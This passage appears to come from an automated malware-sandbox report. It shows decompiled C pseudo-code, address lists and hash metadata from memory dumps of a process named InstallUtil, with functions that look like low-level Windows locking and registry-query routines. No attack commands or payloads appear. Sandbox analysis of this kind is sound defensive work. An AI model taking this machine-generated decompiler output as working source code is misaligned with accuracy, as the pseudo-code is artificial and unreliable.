                      									if((_t231 & 0x00000001) != 0) {
                      										goto L76;
                      									}
                      									_t73 = _t231 + 1; // 0x1
                      									_t210 = _t73;
                      									asm("lock cmpxchg [edi], ecx");
                      									__eflags = _t231 - _t231;
                      									if(_t231 != _t231) {
                      										L92:
                      										_t133 = E012F6B90(_t210,  &_v64);
                      										_t262 =  *0x13b8608; // 0x0
                      										L93:
                      										_t231 = _t262;
                      										continue;
                      									}
                      									_t240 = _v56;
                      									goto L10;
                      									L76:
                      									_t169 = E012FE180(_t133);
                      									__eflags = _t169;
                      									if(_t169 != 0) {
                      										_push(0xc000004b);
                      										_push(0xffffffff);
                      										E013097C0();
                      										_t231 = _v68;
                      									}
                      									_v72 = 0;
                      									_v24 =  *( *[fs:0x18] + 0x24);
                      									_v16 = 3;
                      									_v28 = 0;
                      									__eflags = _t231 & 0x00000002;
                      									if((_t231 & 0x00000002) == 0) {
                      										_v32 =  &_v36;
                      										_t174 = _t231 >> 4;
                      										__eflags = 1 - _t174;
                      										_v20 = _t174;
                      										asm("sbb ecx, ecx");
                      										_t210 = 3 |  &_v36;
                      										__eflags = _t174;
                      										if(_t174 == 0) {
                      											_v20 = 0xfffffffe;
                      										}
                      									} else {
                      										_v32 = 0;
                      										_v20 = 0xffffffff;
                      										_v36 = _t231 & 0xfffffff0;
                      										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                      										_v72 =  !(_t231 >> 2) & 0xffffff01;
                      									}
                      									asm("lock cmpxchg [edi], esi");
                      									_t262 = _t231;
                      									__eflags = _t262 - _t231;
                      									if(_t262 != _t231) {
                      										goto L92;
                      									} else {
                      										__eflags = _v72;
                      										if(_v72 != 0) {
                      											E0130006A(0x13b8608, _t210);
                      										}
                      										__eflags =  *0x7ffe036a - 1;
                      										if(__eflags <= 0) {
                      											L89:
                      											_t133 =  &_v16;
                      											asm("lock btr dword [eax], 0x1");
                      											if(__eflags >= 0) {
                      												goto L93;
                      											} else {
                      												goto L90;
                      											}
                      											do {
                      												L90:
                      												_push(0);
                      												_push(0x13b8608);
                      												E0130B180();
                      												_t133 = _v24;
                      												__eflags = _t133 & 0x00000004;
                      											} while ((_t133 & 0x00000004) == 0);
                      											goto L93;
                      										} else {
                      											_t218 =  *0x13b6904; // 0x400
                      											__eflags = _t218;
                      											if(__eflags == 0) {
                      												goto L89;
                      											} else {
                      												goto L87;
                      											}
                      											while(1) {
                      												L87:
                      												__eflags = _v16 & 0x00000002;
                      												if(__eflags == 0) {
                      													goto L89;
                      												}
                      												asm("pause");
                      												_t218 = _t218 - 1;
                      												__eflags = _t218;
                      												if(__eflags != 0) {
                      													continue;
                      												}
                      												goto L89;
                      											}
                      											goto L89;
                      										}
                      									}
                      								}
                      							}
                      							L10:
                      							_t229 =  *0x13b6e48; // 0x0
                      							_v72 = _t229;
                      							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                      								E012DFFB0(_t198, _t240, 0x13b8608);
                      								_t253 = _v76;
                      								goto L29;
                      							} else {
                      								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                      								asm("lock cmpxchg [esi], ecx");
                      								_t215 = 1;
                      								if(1 != 1) {
                      									while(1) {
                      										_t246 = _t215 & 0x00000006;
                      										_t180 = _t215;
                      										__eflags = _t246 - 2;
                      										_v56 = _t246;
                      										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                      										asm("lock cmpxchg [edi], esi");
                      										_t248 = _v56;
                      										__eflags = _t180 - _t215;
                      										if(_t180 == _t215) {
                      											break;
                      										}
                      										_t215 = _t180;
                      									}
                      									__eflags = _t248 - 2;
                      									if(_t248 == 2) {
                      										__eflags = 0;
                      										E013000C2(0x13b8608, 0, _t235);
                      									}
                      									_t229 = _v72;
                      								}
                      								goto L14;
                      							}
                      						}
                      					}
                      				}
                      				_t227 = 0;
                      				_v75 = 0;
                      				if(_t128 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}

                      0x012f21ac
                      0x012f21ae
                      0x012f21b3
                      0x012f228b
                      0x012f2290
                      0x012f2379
                      0x012f2296
                      0x012f2298
                      0x012f2298
                      0x012f2290
                      0x012f21b9
                      0x012f21be
                      0x012f22a2
                      0x012f22a2
                      0x012f21c4
                      0x012f21c8
                      0x012f21cc
                      0x012f21d0
                      0x012f21d4
                      0x012f21de
                      0x012f21e3
                      0x01335a29
                      0x01335a2c
                      0x00000000
                      0x00000000
                      0x01335a3b
                      0x00000000
                      0x012f21e9
                      0x012f21e9
                      0x012f21e9
                      0x012f21ee
                      0x012f21f1
                      0x01335a45
                      0x01335a4b
                      0x01335a52
                      0x01335a58
                      0x01335a5d
                      0x01335a5f
                      0x01335a71
                      0x01335a61
                      0x01335a6a
                      0x01335a6a
                      0x01335a76
                      0x01335a79
                      0x01335a7f
                      0x01335a83
                      0x01335a85
                      0x01335a87
                      0x01335a87
                      0x01335a8c
                      0x01335a91
                      0x01335a97
                      0x01335a9f
                      0x01335aa0
                      0x01335aa1
                      0x01335aa6
                      0x01335aab
                      0x01335ab1
                      0x01335ab3
                      0x01335ab9
                      0x01335aca
                      0x01335ad4
                      0x01335ad4
                      0x01335ade
                      0x01335ade
                      0x01335aab
                      0x01335a79
                      0x01335a52
                      0x012f21f7
                      0x012f21f9
                      0x012f21fe
                      0x012f21fe
                      0x012f21e3
                      0x012f2195
                      0x012f236c
                      0x012f2122
                      0x012f2122
                      0x012f2124
                      0x012f2231
                      0x012f2236
                      0x012f2236
                      0x012f2238
                      0x012f2238
                      0x012f2240
                      0x012f2242
                      0x012f2244
                      0x013359fc
                      0x012f218c
                      0x012f218c
                      0x00000000
                      0x012f218c
                      0x012f224a
                      0x012f224f
                      0x012f2256
                      0x012f2304
                      0x012f2309
                      0x012f230f
                      0x012f231e
                      0x012f231e
                      0x012f231e
                      0x012f2320
                      0x012f2325
                      0x012f232a
                      0x012f232c
                      0x012f233e
                      0x012f233e
                      0x00000000
                      0x012f232c
                      0x012f2311
                      0x012f2317
                      0x012f231a
                      0x012f231c
                      0x012f2380
                      0x012f2380
                      0x012f2380
                      0x012f2384
                      0x00000000
                      0x00000000
                      0x012f2386
                      0x00000000
                      0x012f231c
                      0x012f225c
                      0x012f225c
                      0x00000000
                      0x012f225c
                      0x012f212a
                      0x012f2134
                      0x012f2138
                      0x012f213d
                      0x01335858
                      0x01335863
                      0x01335863
                      0x01335867
                      0x0133586a
                      0x00000000
                      0x00000000
                      0x0133586c
                      0x0133586c
                      0x01335871
                      0x01335875
                      0x01335877
                      0x01335997
                      0x0133599c
                      0x013359a1
                      0x013359a7
                      0x013359a7
                      0x00000000
                      0x013359a7
                      0x0133587d
                      0x00000000
                      0x0133588b
                      0x0133588b
                      0x01335890
                      0x01335892
                      0x01335894
                      0x01335899
                      0x0133589b
                      0x013358a0
                      0x013358a0
                      0x013358aa
                      0x013358b2
                      0x013358b6
                      0x013358be
                      0x013358c6
                      0x013358c9
                      0x0133590d
                      0x01335917
                      0x0133591a
                      0x0133591c
                      0x01335920
                      0x01335928
                      0x0133592a
                      0x0133592c
                      0x0133592e
                      0x0133592e
                      0x013358cb
                      0x013358cd
                      0x013358d8
                      0x013358e0
                      0x013358f4
                      0x013358fe
                      0x013358fe
                      0x0133593a
                      0x0133593e
                      0x01335940
                      0x01335942
                      0x00000000
                      0x01335944
                      0x01335944
                      0x01335949
                      0x0133594e
                      0x0133594e
                      0x01335953
                      0x0133595b
                      0x01335976
                      0x01335976
                      0x0133597a
                      0x0133597f
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x01335981
                      0x01335981
                      0x01335981
                      0x01335983
                      0x01335988
                      0x0133598d
                      0x01335991
                      0x01335991
                      0x00000000
                      0x0133595d
                      0x0133595d
                      0x01335963
                      0x01335965
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x01335967
                      0x01335967
                      0x0133596b
                      0x0133596d
                      0x00000000
                      0x00000000
                      0x0133596f
                      0x01335971
                      0x01335971
                      0x01335974
                      0x00000000
                      0x00000000
                      0x00000000
                      0x01335974
                      0x00000000
                      0x01335967
                      0x0133595b
                      0x01335942
                      0x01335863
                      0x012f2143
                      0x012f2143
                      0x012f2149
                      0x012f214f
                      0x012f22f1
                      0x012f22f6
                      0x00000000
                      0x012f2173
                      0x012f2173
                      0x012f217d
                      0x012f2181
                      0x012f2186
                      0x013359ae
                      0x013359b2
                      0x013359b5
                      0x013359b7
                      0x013359ba
                      0x013359cd
                      0x013359d1
                      0x013359d5
                      0x013359d9
                      0x013359db
                      0x00000000
                      0x00000000
                      0x013359dd
                      0x013359dd
                      0x013359e1
                      0x013359e4
                      0x013359e7
                      0x013359ee
                      0x013359ee
                      0x013359f3
                      0x013359f3
                      0x00000000
                      0x012f2186
                      0x012f214f
                      0x012f2106
                      0x012f2266
                      0x012f20d8
                      0x012f20da
                      0x012f20e0
                      0x00000000
                      0x00000000
                      0x00000000

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 67b6423d918636b8d9e50b92f19aabce898b605562288fb1fffbba2e4d1872fb
                      • Instruction ID: fd5671f0dd99e35dc57df20630a0503f5fd36be3a482edef4672709d8fd8c7fd
                      • Opcode Fuzzy Hash: 67b6423d918636b8d9e50b92f19aabce898b605562288fb1fffbba2e4d1872fb
                      • Instruction Fuzzy Hash: 4FF1F575618342DFE726CB2CC48076BBBE5ABC6328F04852DEB958B281D774D841CB86
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E012D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                      				void* _t136;
                      				signed int _t139;
                      				signed int _t141;
                      				signed int _t145;
                      				intOrPtr _t146;
                      				signed int _t149;
                      				signed int _t150;
                      				signed int _t161;
                      				signed int _t163;
                      				signed int _t165;
                      				signed int _t169;
                      				signed int _t171;
                      				signed int _t194;
                      				signed int _t200;
                      				void* _t201;
                      				signed int _t204;
                      				signed int _t206;
                      				signed int _t210;
                      				signed int _t214;
                      				signed int _t215;
                      				signed int _t218;
                      				void* _t221;
                      				signed int _t224;
                      				signed int _t226;
                      				intOrPtr _t228;
                      				signed int _t232;
                      				signed int _t233;
                      				signed int _t234;
                      				void* _t237;
                      				void* _t238;
                      
                      				_t236 = __esi;
                      				_t235 = __edi;
                      				_t193 = __ebx;
                      				_push(0x70);
                      				_push(0x139f9c0);
                      				E0131D0E8(__ebx, __edi, __esi);
                      				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                      				if( *0x13b7b04 == 0) {
                      					L4:
                      					goto L5;
                      				} else {
                      					_t136 = E012DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                      					_t236 = 0;
                      					if(_t136 < 0) {
                      						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                      					}
                      					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                      						_t193 =  *( *[fs:0x30] + 0x18);
                      						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                      						 *(_t237 - 0x68) = _t236;
                      						 *(_t237 - 0x6c) = _t236;
                      						_t235 = _t236;
                      						 *(_t237 - 0x60) = _t236;
                      						E012E2280( *[fs:0x30], 0x13b8550);
                      						_t139 =  *0x13b7b04; // 0x1
                      						__eflags = _t139 - 1;
                      						if(__eflags != 0) {
                      							_t200 = 0xc;
                      							_t201 = _t237 - 0x40;
                      							_t141 = E012FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                      							 *(_t237 - 0x44) = _t141;
                      							__eflags = _t141;
                      							if(_t141 < 0) {
                      								L50:
                      								E012DFFB0(_t193, _t235, 0x13b8550);
                      								L5:
                      								return E0131D130(_t193, _t235, _t236);
                      							}
                      							_push(_t201);
                      							_t221 = 0x10;
                      							_t202 =  *(_t237 - 0x40);
                      							_t145 = E012C1C45( *(_t237 - 0x40), _t221);
                      							 *(_t237 - 0x44) = _t145;
                      							__eflags = _t145;
                      							if(_t145 < 0) {
                      								goto L50;
                      							}
                      							_t146 =  *0x13b7b9c; // 0x0
                      							_t235 = L012E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                      							 *(_t237 - 0x60) = _t235;
                      							__eflags = _t235;
                      							if(_t235 == 0) {
                      								_t149 = 0xc0000017;
                      								 *(_t237 - 0x44) = 0xc0000017;
                      							} else {
                      								_t149 =  *(_t237 - 0x44);
                      							}
                      							__eflags = _t149;
                      							if(__eflags >= 0) {
                      								L8:
                      								 *(_t237 - 0x64) = _t235;
                      								_t150 =  *0x13b7b10; // 0x0
                      								 *(_t237 - 0x4c) = _t150;
                      								_push(_t237 - 0x74);
                      								_push(_t237 - 0x39);
                      								_push(_t237 - 0x58);
                      								_t193 = E012FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                      								 *(_t237 - 0x44) = _t193;
                      								__eflags = _t193;
                      								if(_t193 < 0) {
                      									L30:
                      									E012DFFB0(_t193, _t235, 0x13b8550);
                      									__eflags = _t235 - _t237 - 0x38;
                      									if(_t235 != _t237 - 0x38) {
                      										_t235 =  *(_t237 - 0x48);
                      										L012E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                      									} else {
                      										_t235 =  *(_t237 - 0x48);
                      									}
                      									__eflags =  *(_t237 - 0x6c);
                      									if( *(_t237 - 0x6c) != 0) {
                      										L012E77F0(_t235, _t236,  *(_t237 - 0x6c));
                      									}
                      									__eflags = _t193;
                      									if(_t193 >= 0) {
                      										goto L4;
                      									} else {
                      										goto L5;
                      									}
                      								}
                      								_t204 =  *0x13b7b04; // 0x1
                      								 *(_t235 + 8) = _t204;
                      								__eflags =  *((char*)(_t237 - 0x39));
                      								if( *((char*)(_t237 - 0x39)) != 0) {
                      									 *(_t235 + 4) = 1;
                      									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                      									_t161 =  *0x13b7b10; // 0x0
                      									 *(_t237 - 0x4c) = _t161;
                      								} else {
                      									 *(_t235 + 4) = _t236;
                      									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                      								}
                      								 *((intOrPtr*)(_t237 - 0x54)) = E013037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                      								_t224 = _t236;
                      								 *(_t237 - 0x40) = _t236;
                      								 *(_t237 - 0x50) = _t236;
                      								while(1) {
                      									_t163 =  *(_t235 + 8);
                      									__eflags = _t224 - _t163;
                      									if(_t224 >= _t163) {
                      										break;
                      									}
                      									_t228 =  *0x13b7b9c; // 0x0
                      									_t214 = L012E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                      									 *(_t237 - 0x78) = _t214;
                      									__eflags = _t214;
                      									if(_t214 == 0) {
                      										L52:
                      										_t193 = 0xc0000017;
                      										L19:
                      										 *(_t237 - 0x44) = _t193;
                      										L20:
                      										_t206 =  *(_t237 - 0x40);
                      										__eflags = _t206;
                      										if(_t206 == 0) {
                      											L26:
                      											__eflags = _t193;
                      											if(_t193 < 0) {
                      												E013037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                      												__eflags =  *((char*)(_t237 - 0x39));
                      												if( *((char*)(_t237 - 0x39)) != 0) {
                      													 *0x13b7b10 =  *0x13b7b10 - 8;
                      												}
                      											} else {
                      												_t169 =  *(_t237 - 0x68);
                      												__eflags = _t169;
                      												if(_t169 != 0) {
                      													 *0x13b7b04 =  *0x13b7b04 - _t169;
                      												}
                      											}
                      											__eflags = _t193;
                      											if(_t193 >= 0) {
                      												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                      											}
                      											goto L30;
                      										}
                      										_t226 = _t206 * 0xc;
                      										__eflags = _t226;
                      										_t194 =  *(_t237 - 0x48);
                      										do {
                      											 *(_t237 - 0x40) = _t206 - 1;
                      											_t226 = _t226 - 0xc;
                      											 *(_t237 - 0x4c) = _t226;
                      											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                      											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                      												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                      												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                      													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                      													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                      													__eflags =  *((char*)(_t237 - 0x39));
                      													if( *((char*)(_t237 - 0x39)) == 0) {
                      														_t171 = _t210;
                      													} else {
                      														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                      														L012E77F0(_t194, _t236, _t210 - 8);
                      														_t171 =  *(_t237 - 0x50);
                      													}
                      													L48:
                      													L012E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                      													L46:
                      													_t206 =  *(_t237 - 0x40);
                      													_t226 =  *(_t237 - 0x4c);
                      													goto L24;
                      												}
                      												 *0x13b7b08 =  *0x13b7b08 + 1;
                      												goto L24;
                      											}
                      											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                      											__eflags = _t171;
                      											if(_t171 != 0) {
                      												__eflags =  *((char*)(_t237 - 0x39));
                      												if( *((char*)(_t237 - 0x39)) == 0) {
                      													goto L48;
                      												}
                      												E013057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                      												goto L46;
                      											}
                      											L24:
                      											__eflags = _t206;
                      										} while (_t206 != 0);
                      										_t193 =  *(_t237 - 0x44);
                      										goto L26;
                      									}
                      									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                      									 *(_t237 - 0x7c) = _t232;
                      									 *(_t232 - 4) = _t214;
                      									 *(_t237 - 4) = _t236;
                      									E0130F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                      									_t238 = _t238 + 0xc;
                      									 *(_t237 - 4) = 0xfffffffe;
                      									_t215 =  *(_t237 - 0x48);
                      									__eflags = _t193;
                      									if(_t193 < 0) {
                      										L012E77F0(_t215, _t236,  *(_t237 - 0x78));
                      										goto L20;
                      									}
                      									__eflags =  *((char*)(_t237 - 0x39));
                      									if( *((char*)(_t237 - 0x39)) != 0) {
                      										_t233 = E012FA44B( *(_t237 - 0x4c));
                      										 *(_t237 - 0x50) = _t233;
                      										__eflags = _t233;
                      										if(_t233 == 0) {
                      											L012E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                      											goto L52;
                      										}
                      										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                      										L17:
                      										_t234 =  *(_t237 - 0x40);
                      										_t218 = _t234 * 0xc;
                      										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                      										 *(_t218 + _t235 + 0x10) = _t236;
                      										_t224 = _t234 + 1;
                      										 *(_t237 - 0x40) = _t224;
                      										 *(_t237 - 0x50) = _t224;
                      										_t193 =  *(_t237 - 0x44);
                      										continue;
                      									}
                      									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                      									goto L17;
                      								}
                      								 *_t235 = _t236;
                      								_t165 = 0x10 + _t163 * 0xc;
                      								__eflags = _t165;
                      								_push(_t165);
                      								_push(_t235);
                      								_push(0x23);
                      								_push(0xffffffff);
                      								_t193 = E013096C0();
                      								goto L19;
                      							} else {
                      								goto L50;
                      							}
                      						}
                      						_t235 = _t237 - 0x38;
                      						 *(_t237 - 0x60) = _t235;
                      						goto L8;
                      					}
                      					goto L4;
                      				}
                      			}

































                      0x012d85bc
                      0x012d85bf
                      0x012d85cc
                      0x012d85d1
                      0x012d85d4
                      0x012d85db
                      0x012d85de
                      0x012d85e0
                      0x01329b5f
                      0x00000000
                      0x01329b5f
                      0x012d85e6
                      0x012d85ea
                      0x012d86c3
                      0x012d86c5
                      0x012d86c8
                      0x012d86ca
                      0x01329b16
                      0x00000000
                      0x01329b16
                      0x012d86d6
                      0x012d85f6
                      0x012d85f6
                      0x012d85f9
                      0x012d8602
                      0x012d8606
                      0x012d860a
                      0x012d860b
                      0x012d860e
                      0x012d8611
                      0x00000000
                      0x012d8611
                      0x012d85f3
                      0x00000000
                      0x012d85f3
                      0x012d8619
                      0x012d861e
                      0x012d861e
                      0x012d8621
                      0x012d8622
                      0x012d8623
                      0x012d8625
                      0x012d862c
                      0x00000000
                      0x012d873d
                      0x00000000
                      0x012d873d
                      0x012d8737
                      0x012d850f
                      0x012d8512
                      0x00000000
                      0x012d8512
                      0x00000000
                      0x012d84d6

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 28e502f9845995428c1c0555ddebbfd9b3c4892e8609775785b568434cd7d803
                      • Instruction ID: d8fdfce1048655501038db448aae60f674f27a2f5eff0e0187134c7135882321
                      • Opcode Fuzzy Hash: 28e502f9845995428c1c0555ddebbfd9b3c4892e8609775785b568434cd7d803
                      • Instruction Fuzzy Hash: 2CB16E74E2025ADFDB19DF99C984AADBBB9FF48308F10412DE605AB345D770A941CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E012CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                      				signed int _v8;
                      				char _v1036;
                      				signed int _v1040;
                      				char _v1048;
                      				signed int _v1052;
                      				signed char _v1056;
                      				void* _v1058;
                      				char _v1060;
                      				signed int _v1064;
                      				void* _v1068;
                      				intOrPtr _v1072;
                      				void* _v1084;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr _t70;
                      				intOrPtr _t72;
                      				signed int _t74;
                      				intOrPtr _t77;
                      				signed int _t78;
                      				signed int _t81;
                      				void* _t101;
                      				signed int _t102;
                      				signed int _t107;
                      				signed int _t109;
                      				signed int _t110;
                      				signed char _t111;
                      				signed int _t112;
                      				signed int _t113;
                      				signed int _t114;
                      				intOrPtr _t116;
                      				void* _t117;
                      				char _t118;
                      				void* _t120;
                      				char _t121;
                      				signed int _t122;
                      				signed int _t123;
                      				signed int _t125;
                      
                      				_t125 = (_t123 & 0xfffffff8) - 0x424;
                      				_v8 =  *0x13bd360 ^ _t125;
                      				_t116 = _a4;
                      				_v1056 = _a16;
                      				_v1040 = _a24;
                      				if(E012D6D30( &_v1048, _a8) < 0) {
                      					L4:
                      					_pop(_t117);
                      					_pop(_t120);
                      					_pop(_t101);
                      					return E0130B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                      				}
                      				_t70 = _a20;
                      				if(_t70 >= 0x3f4) {
                      					_t121 = _t70 + 0xc;
                      					L19:
                      					_t107 =  *( *[fs:0x30] + 0x18);
                      					__eflags = _t107;
                      					if(_t107 == 0) {
                      						L60:
                      						_t68 = 0xc0000017;
                      						goto L4;
                      					}
                      					_t72 =  *0x13b7b9c; // 0x0
                      					_t74 = L012E4620(_t107, _t107, _t72 + 0x180000, _t121);
                      					_v1064 = _t74;
                      					__eflags = _t74;
                      					if(_t74 == 0) {
                      						goto L60;
                      					}
                      					_t102 = _t74;
                      					_push( &_v1060);
                      					_push(_t121);
                      					_push(_t74);
                      					_push(2);
                      					_push( &_v1048);
                      					_push(_t116);
                      					_t122 = E01309650();
                      					__eflags = _t122;
                      					if(_t122 >= 0) {
                      						L7:
                      						_t114 = _a12;
                      						__eflags = _t114;
                      						if(_t114 != 0) {
                      							_t77 = _a20;
                      							L26:
                      							_t109 =  *(_t102 + 4);
                      							__eflags = _t109 - 3;
                      							if(_t109 == 3) {
                      								L55:
                      								__eflags = _t114 - _t109;
                      								if(_t114 != _t109) {
                      									L59:
                      									_t122 = 0xc0000024;
                      									L15:
                      									_t78 = _v1052;
                      									__eflags = _t78;
                      									if(_t78 != 0) {
                      										L012E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                      									}
                      									_t68 = _t122;
                      									goto L4;
                      								}
                      								_t110 = _v1056;
                      								_t118 =  *((intOrPtr*)(_t102 + 8));
                      								_v1060 = _t118;
                      								__eflags = _t110;
                      								if(_t110 == 0) {
                      									L10:
                      									_t122 = 0x80000005;
                      									L11:
                      									_t81 = _v1040;
                      									__eflags = _t81;
                      									if(_t81 == 0) {
                      										goto L15;
                      									}
                      									__eflags = _t122;
                      									if(_t122 >= 0) {
                      										L14:
                      										 *_t81 = _t118;
                      										goto L15;
                      									}
                      									__eflags = _t122 - 0x80000005;
                      									if(_t122 != 0x80000005) {
                      										goto L15;
                      									}
                      									goto L14;
                      								}
                      								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                      								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                      									goto L10;
                      								}
                      								_push( *((intOrPtr*)(_t102 + 8)));
                      								_t59 = _t102 + 0xc; // 0xc
                      								_push(_t110);
                      								L54:
                      								E0130F3E0();
                      								_t125 = _t125 + 0xc;
                      								goto L11;
                      							}
                      							__eflags = _t109 - 7;
                      							if(_t109 == 7) {
                      								goto L55;
                      							}
                      							_t118 = 4;
                      							__eflags = _t109 - _t118;
                      							if(_t109 != _t118) {
                      								__eflags = _t109 - 0xb;
                      								if(_t109 != 0xb) {
                      									__eflags = _t109 - 1;
                      									if(_t109 == 1) {
                      										__eflags = _t114 - _t118;
                      										if(_t114 != _t118) {
                      											_t118 =  *((intOrPtr*)(_t102 + 8));
                      											_v1060 = _t118;
                      											__eflags = _t118 - _t77;
                      											if(_t118 > _t77) {
                      												goto L10;
                      											}
                      											_push(_t118);
                      											_t56 = _t102 + 0xc; // 0xc
                      											_push(_v1056);
                      											goto L54;
                      										}
                      										__eflags = _t77 - _t118;
                      										if(_t77 != _t118) {
                      											L34:
                      											_t122 = 0xc0000004;
                      											goto L15;
                      										}
                      										_t111 = _v1056;
                      										__eflags = _t111 & 0x00000003;
                      										if((_t111 & 0x00000003) == 0) {
                      											_v1060 = _t118;
                      											__eflags = _t111;
                      											if(__eflags == 0) {
                      												goto L10;
                      											}
                      											_t42 = _t102 + 0xc; // 0xc
                      											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                      											_v1048 =  *((intOrPtr*)(_t102 + 8));
                      											_push(_t111);
                      											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                      											_push(0);
                      											_push( &_v1048);
                      											_t122 = E013013C0(_t102, _t118, _t122, __eflags);
                      											L44:
                      											_t118 = _v1072;
                      											goto L11;
                      										}
                      										_t122 = 0x80000002;
                      										goto L15;
                      									}
                      									_t122 = 0xc0000024;
                      									goto L44;
                      								}
                      								__eflags = _t114 - _t109;
                      								if(_t114 != _t109) {
                      									goto L59;
                      								}
                      								_t118 = 8;
                      								__eflags = _t77 - _t118;
                      								if(_t77 != _t118) {
                      									goto L34;
                      								}
                      								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                      								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                      									goto L34;
                      								}
                      								_t112 = _v1056;
                      								_v1060 = _t118;
                      								__eflags = _t112;
                      								if(_t112 == 0) {
                      									goto L10;
                      								}
                      								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                      								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                      								goto L11;
                      							}
                      							__eflags = _t114 - _t118;
                      							if(_t114 != _t118) {
                      								goto L59;
                      							}
                      							__eflags = _t77 - _t118;
                      							if(_t77 != _t118) {
                      								goto L34;
                      							}
                      							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                      							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                      								goto L34;
                      							}
                      							_t113 = _v1056;
                      							_v1060 = _t118;
                      							__eflags = _t113;
                      							if(_t113 == 0) {
                      								goto L10;
                      							}
                      							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                      							goto L11;
                      						}
                      						_t118 =  *((intOrPtr*)(_t102 + 8));
                      						__eflags = _t118 - _a20;
                      						if(_t118 <= _a20) {
                      							_t114 =  *(_t102 + 4);
                      							_t77 = _t118;
                      							goto L26;
                      						}
                      						_v1060 = _t118;
                      						goto L10;
                      					}
                      					__eflags = _t122 - 0x80000005;
                      					if(_t122 != 0x80000005) {
                      						goto L15;
                      					}
                      					L012E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                      					L18:
                      					_t121 = _v1060;
                      					goto L19;
                      				}
                      				_push( &_v1060);
